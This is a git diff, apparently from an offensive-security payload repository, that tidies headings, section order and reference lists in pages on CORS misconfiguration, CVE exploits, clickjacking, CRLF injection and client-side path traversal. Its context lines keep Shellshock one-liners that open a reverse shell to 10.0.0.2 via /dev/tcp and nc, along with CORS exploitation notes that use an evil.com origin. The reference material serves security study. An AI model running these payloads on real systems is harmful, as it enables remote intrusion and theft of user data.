Normalize page header for API, CSPT, CORS, CSRF

API Key Leaks/IIS-Machine-Keys.md

@@ -16,12 +16,6 @@
 * [References](#references)
 
 
-**Requirements**
-
-* `__VIEWSTATE`
-* `__VIEWSTATEGENERATOR`* 
-
-
 ## Viewstate Format
 
 ViewState in IIS is a technique used to retain the state of web controls between postbacks in ASP.NET applications. It stores data in a hidden field on the page, allowing the page to maintain user input and other state information.
@@ -135,6 +129,12 @@ List of interesting machine keys to use:
 
 First you need to decode the Viewstate to know if the MAC and the encryption are enabled. 
 
+**Requirements**
+
+* `__VIEWSTATE`
+* `__VIEWSTATEGENERATOR`
+
+
 ### MAC Is Not Enabled
 
 ```ps1

CORS Misconfiguration/README.md

@@ -2,13 +2,21 @@
 
 > A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. 
 
+
 ## Summary
 
 * [Tools](#tools)
-* [Prerequisites](#prerequisites)
+* [Requirements](#requirements)
 * [Exploitation](#exploitation)
+    * [Origin Reflection](#origin-reflection)
+    * [Null Origin](#null-origin)
+    * [XSS on Trusted Origin](#xss-on-trusted-origin)
+    * [Wildcard Origin `*` without Credentials](#wildcard-origin--without-credentials)
+    * [Expanding the Origin](#expanding-the-origin)
+* [Labs](#labs)
 * [References](#references)
 
+
 ## Tools
 
 * [s0md3v/Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/)
@@ -17,17 +25,19 @@
 * [trufflesecurity/of-cors - Exploit CORS misconfigurations on the internal networks](https://github.com/trufflesecurity/of-cors) 
 * [omranisecurity/CorsOne - Fast CORS Misconfiguration Discovery Tool](https://github.com/omranisecurity/CorsOne) 
 
-## Prerequisites
+
+## Requirements
 
 * BURP HEADER> `Origin: https://evil.com`
 * VICTIM HEADER> `Access-Control-Allow-Credential: true`
 * VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
 
+
 ## Exploitation
 
 Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`.
 
-### Vulnerable Example: Origin Reflection
+### Origin Reflection
 
 #### Vulnerable Implementation
 
@@ -87,7 +97,7 @@ or
  </html>
 ```
 
-### Vulnerable Example: Null Origin
+### Null Origin
 
 #### Vulnerable Implementation
 
@@ -128,7 +138,7 @@ origin in the request:
 </script>"></iframe> 
 ```
 
-### Vulnerable Example: XSS on Trusted Origin
+### XSS on Trusted Origin
 
 If the application does implement a strict whitelist of allowed origins, the
 exploit codes from above do not work. But if you have an XSS on a trusted
@@ -139,7 +149,7 @@ again.
 https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
 ```
 
-### Vulnerable Example: Wildcard Origin `*` without Credentials
+### Wildcard Origin `*` without Credentials
 
 If the server responds with a wildcard origin `*`, **the browser does never send
 the cookies**. However, if the server does not require authentication, it's still
@@ -178,7 +188,9 @@ function reqListener() {
 };
 ```
 
-### Vulnerable Example: Expanding the Origin / Regex Issues
+
+### Expanding the Origin
+
 Occasionally, certain expansions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header.
 
 #### Vulnerable Implementation (Example 1)
@@ -247,26 +259,25 @@ function reqListener() {
 };
 ```
 
-## Labs
 
-* [CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack)
-* [CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack)
-* [CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack)
-* [CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack)
+## Labs
 
-## Bug Bounty reports
+* [PortSwigger - CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack)
+* [PortSwigger - CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack)
+* [PortSwigger - CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack)
+* [PortSwigger - CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack)
 
-* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
-* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
-* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200)
-* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
-* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298)
 
 ## References
 
-- [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
-- [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
-- [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - December 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
+- [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7) - December 20, 2018](https://hackerone.com/reports/470298)
 - [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/)
+- [CORS misconfig | Account Takeover - Rohan (nahoragg) - October 20, 2018](https://hackerone.com/reports/426147)
+- [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t) - October 29, 2018](https://hackerone.com/reports/430249)
+- [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax) - September 15, 2016](https://hackerone.com/reports/168574)
+- [CORS Misconfigurations Explained - Detectify Blog - Apr 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
 - [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors)
-- [CORS Misconfigurations Explained - Detectify Blog - Apr 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
+- [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy) - June 1, 2017](https://hackerone.com/reports/235200)
+- [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
+- [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - December 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
+- [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)

CRLF Injection/README.md

@@ -112,7 +112,7 @@ Remainder:
 
 ## Labs
 
-* [Lab: HTTP/2 request splitting via CRLF injection - PortSwigger](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
+* [PortSwigger - HTTP/2 request splitting via CRLF injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
 
 
 ## References

CVE Exploits/README.md

@@ -1,5 +1,21 @@
 # Common Vulnerabilities and Exposures
 
+A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known cybersecurity vulnerability. CVEs help standardize the naming and tracking of vulnerabilities, making it easier for organizations, security professionals, and software vendors to share information and manage risks associated with these vulnerabilities. Each CVE entry includes a brief description of the vulnerability, its potential impact, and details about affected software or systems.
+
+## Summary
+
+* [Tools](#tools)
+* [Big CVEs in the last 15 years](#big-cves-in-the-last-15-years)
+    * [CVE-2017-0144 - EternalBlue](#cve-2017-0144---eternalblue)
+    * [CVE-2017-5638 - Apache Struts 2](#cve-2017-5638---apache-struts-2)
+    * [CVE-2018-7600 - Drupalgeddon 2](#cve-2018-7600---drupalgeddon-2)
+    * [CVE-2019-0708 - BlueKeep](#cve-2019-0708---bluekeep)
+    * [CVE-2019-19781 - Citrix ADC Netscaler](#cve-2019-19781---citrix-adc-netscaler)
+    * [CVE-2014-0160 - Heartbleed](#cve-2014-0160---heartbleed)
+    * [CVE-2014-6271 - Shellshock](#cve-2014-6271---shellshock)
+* [References](#references)
+
+
 ## Tools
 
 - [Trickest CVE Repository - Automated collection of CVEs and PoC's](https://github.com/trickest/cve)
@@ -8,7 +24,7 @@
 - [CVE Details - The ultimate security vulnerability datasource](https://www.cvedetails.com)
 
 
-## Big CVEs in the last 5 years.
+## Big CVEs in the last 15 years
 
 ### CVE-2017-0144 - EternalBlue
 
@@ -24,19 +40,23 @@ Afftected systems:
 - Windows 10 Gold, 1511, and 1607
 - Windows Server 2016
 
+
 ### CVE-2017-5638 - Apache Struts 2
 
 On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
 
+
 ### CVE-2018-7600 - Drupalgeddon 2
 
 A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
 
+
 ### CVE-2019-0708 - BlueKeep
 
 A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
 
-### CVE-2019-19781 -  Citrix ADC Netscaler
+
+### CVE-2019-19781 - Citrix ADC Netscaler
 
 A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.
 
@@ -47,12 +67,12 @@ Affected products:
 - Citrix ADC and NetScaler Gateway version 11.1 all supported builds
 - Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
 
-## Older, but not forgotten
 
 ### CVE-2014-0160 - Heartbleed
 
 The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
 
+
 ### CVE-2014-6271 - Shellshock
 
 Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
@@ -62,7 +82,8 @@ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0
 curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi" 
 ```
 
-## Thanks to
+
+## References
 
 * [Heartbleed - Official website](http://heartbleed.com)
 * [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))

Clickjacking/README.md

@@ -1,9 +1,6 @@
 # Clickjacking
 
-> Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives,
-> potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions
-> as such as typing in the password, clicking on ‘Delete my account’ button, liking a post, deleting a post, commenting on a blog. In other words all the actions
-> that a normal user can do on a legitimate website can be done using clickjacking.
+> Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives, potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions as such as typing in the password, clicking on ‘Delete my account’ button, liking a post, deleting a post, commenting on a blog. In other words all the actions that a normal user can do on a legitimate website can be done using clickjacking.
 
 ## Summary
 
@@ -22,8 +19,8 @@
     * [IE8 XSS filter](#ie8-xss-filter)
     * [Chrome 4.0 XSSAuditor filter](#chrome-40-xssauditor-filter)
 * [Challenge](#challenge)
-* [Practice Environments](#practice-environments)
-* [Reference](#references)
+* [Labs](#labs)
+* [References](#references)
 
 ## Tools
 
@@ -229,10 +226,10 @@ Inspect the following code:
 Determine the Clickjacking vulnerability within this code snippet. Identify how the hidden iframe is being used to exploit the user's actions when they click the button, leading them to a malicious website.
 
 
-## Practice Environments
+## Labs
 
 * [OWASP WebGoat](https://owasp.org/www-project-webgoat/)
-* [Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking)
+* [OWASP Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking)
 
 
 ## References

Client Side Path Traversal/README.md

@@ -1,15 +1,18 @@
 # Client Side Path Traversal
 
-Client-Side Path Traversal (CSPT), sometimes also referred to as "On-site Request Forgery," is a vulnerability that can be exploited as a tool for CSRF or XSS attacks.  
-It takes advantage of the client side's ability to make requests using fetch to a URL, where multiple "../" characters can be injected. After normalization, these characters redirect the request to a different URL, potentially leading to security breaches.  
-Since every request is initiated from within the frontend of the application, the browser automatically includes cookies and other authentication mechanisms, making them available for exploitation in these attacks.
+> Client-Side Path Traversal (CSPT), sometimes also referred to as "On-site Request Forgery," is a vulnerability that can be exploited as a tool for CSRF or XSS attacks.  
+
+> It takes advantage of the client side's ability to make requests using fetch to a URL, where multiple "../" characters can be injected. After normalization, these characters redirect the request to a different URL, potentially leading to security breaches.  
+
+> Since every request is initiated from within the frontend of the application, the browser automatically includes cookies and other authentication mechanisms, making them available for exploitation in these attacks.
+
 
 ## Summary
 
 * [Tools](#tools)
-* [Lab](#lab)
 * [CSPT to XSS](#cspt-to-xss)
 * [CSPT to CSRF](#cspt-to-xss)
+* [Labs](#labs)
 * [References](#references)
 
 
@@ -18,11 +21,6 @@ Since every request is initiated from within the frontend of the application, th
 * [doyensec/CSPTBurpExtension](https://github.com/doyensec/CSPTBurpExtension) - CSPT is an open-source Burp Suite extension to find and exploit Client-Side Path Traversal.
 
 
-## Lab
-
-* [doyensec/CSPTPlayground](https://github.com/doyensec/CSPTPlayground) - CSPTPlayground is an open-source playground to find and exploit Client-Side Path Traversal (CSPT).
-
-
 ## CSPT to XSS
 
 ![](https://matanber.com/images/blog/cspt-query-param.png)
@@ -61,6 +59,11 @@ Real-World Scenarios:
 * [CVE-2023-5123 : CSPT2CSRF in Grafana’s JSON API Plugin](https://medium.com/@maxime.escourbiac/grafana-cve-2023-5123-write-up-74e1be7ef652) 
 
 
+## Labs
+
+* [doyensec/CSPTPlayground](https://github.com/doyensec/CSPTPlayground) - CSPTPlayground is an open-source playground to find and exploit Client-Side Path Traversal (CSPT).
+
+
 ## References
 
 - [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - 02 Jul 2024](https://blog.doyensec.com/2024/07/02/cspt2csrf.html)